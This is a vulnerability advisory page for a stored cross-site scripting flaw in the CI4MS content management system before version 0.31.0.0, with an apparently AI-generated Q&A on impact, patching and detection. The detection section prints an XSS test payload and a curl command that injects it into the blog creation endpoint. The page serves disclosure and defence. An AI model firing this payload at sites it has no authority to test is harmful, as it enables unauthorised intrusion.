CVE-2026-34568
Stored XSS in CI4MS Blog Post Content Before
Publication date: 2026-04-01
Last updated on: 2026-04-06
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| ci4-cms-erp | ci4ms | to 0.31.0.0 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
The vulnerability exists in CI4MS, a CodeIgniter 4-based CMS skeleton, prior to version 0.31.0.0. The application does not properly sanitize user-controlled input when creating or editing blog posts. This allows an attacker to inject malicious JavaScript code into the blog post content. Since this content is stored on the server and later rendered in multiple views without proper output encoding, it leads to stored cross-site scripting (XSS).
How can this vulnerability impact me? :
This stored XSS vulnerability can have serious impacts including allowing attackers to execute malicious scripts in the context of users viewing the affected blog posts. This can lead to theft of user credentials, session hijacking, defacement of the website, or distribution of malware. The CVSS score of 9.1 indicates a high severity with potential impacts on confidentiality, integrity, and availability.
What immediate steps should I take to mitigate this vulnerability?
The vulnerability is caused by improper sanitization of user input in blog post creation or editing, leading to stored cross-site scripting (XSS). The immediate mitigation step is to upgrade the CI4MS application to version 0.31.0.0 or later, where this issue has been patched.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability allows an attacker to inject malicious JavaScript payloads into blog post content, which is then stored and rendered unsafely in the application. This stored cross-site scripting (XSS) flaw can lead to unauthorized access, data manipulation, or disclosure.
Such security weaknesses can impact compliance with common standards and regulations like GDPR and HIPAA, which require protection of personal data and secure handling of user input to prevent unauthorized access or data breaches.
Failure to properly sanitize and encode user input, as seen in this vulnerability, may result in violations of these regulations due to potential data exposure or compromise.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by testing the blog post creation and editing endpoints for stored cross-site scripting (XSS) payloads. Specifically, you can attempt to inject a JavaScript payload such as `<img src=x onerror=alert(document.domain)>` into blog post content via the vulnerable endpoints /backend/blogs/create, /backend/blogs/, and /blog/{id}.
To detect the vulnerability on your system, you can use HTTP request tools like curl or automated web vulnerability scanners to submit payloads and observe if the injected script executes when viewing the blog posts.
Example curl command to test injection:
- curl -X POST -d 'content=<img src=x onerror=alert(document.domain)>' https://your-target-domain/backend/blogs/create
After injecting, visit the blog post page (e.g., /blog/{id}) in a browser or use tools that can detect script execution to confirm if the payload executes, indicating the presence of the vulnerability.
Additionally, review application code or logs for usage of unsafe methods like `.html()` or innerHTML-like functions that render user input without proper sanitization or encoding.